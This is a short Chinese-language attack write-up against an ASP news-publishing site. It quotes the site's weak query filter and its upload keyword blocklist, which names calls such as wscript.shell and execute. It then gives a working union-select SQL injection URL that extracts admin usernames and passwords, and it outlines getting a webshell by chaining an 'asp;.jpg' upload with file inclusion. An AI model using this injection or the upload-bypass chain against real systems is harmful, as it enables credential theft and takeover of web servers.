Author:roker
文件dataname.asp
[php]
path_back=LCase(request.servervariables("QUERY_STRING"))
if instr(path_back,"insert")<>0 or instr(path_back,"update")<>0 or instr(path_back,"delete")<>0
or instr(path_back,"(")<>0 or instr(path_back,"'")<>0 or instr(path_back," or ")<>0 or instr(path_back,"replace")<>0
or instr(path_back,"eval")<>0 then
response.write "
奇葩了。。不知他这么写和没过滤有什么区别。。
于是 看了下数据文件表的结构。。
exp:[php]
show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,s_user,9,10,11,12,s_pwd,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38%20from%20admin[/php]
接下来 getshell
有两个上传的地方
一个是 ewebitor
一个是他自己写的
ewebitor只能上传jpg等正常文件,其他可以利用的都删了
看他自己写的上传。。
可以上传 2013xx.asp;.jpg格式的
可是[php]
set MyFile = server.CreateObject("Scripting.FileSystemObject")
set MyText = MyFile.OpenTextFile(Server.mappath(filename)) '读取文本文件
sTextAll = lcase(MyText.ReadAll())
MyText.close
set MyFile = nothing
sStr=".getfolder|.createfolder|.deletefolder|.createdirectory|.deletedirectory|eval|雷驰新闻发布|script|"
sStr=sStr&".saveas|wscript.shell|script.encode|server.|.createobject|execute|activexobject|language="
snum = split(sStr,"|")
for i=0 to ubound(snum)
if instr(sTextAll,snum(i)) then
set filedel = server.CreateObject("Scripting.FileSystemObject")
filedel.deletefile Server.mappath(filename)
set filedel = nothing
Response.Write("
")
Response.End()
end if
next[/php]
各种过滤有木有啊
可是他忘记了文件包含!
所以 两个上传 结合在一起 就可以getshell啦~~~
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论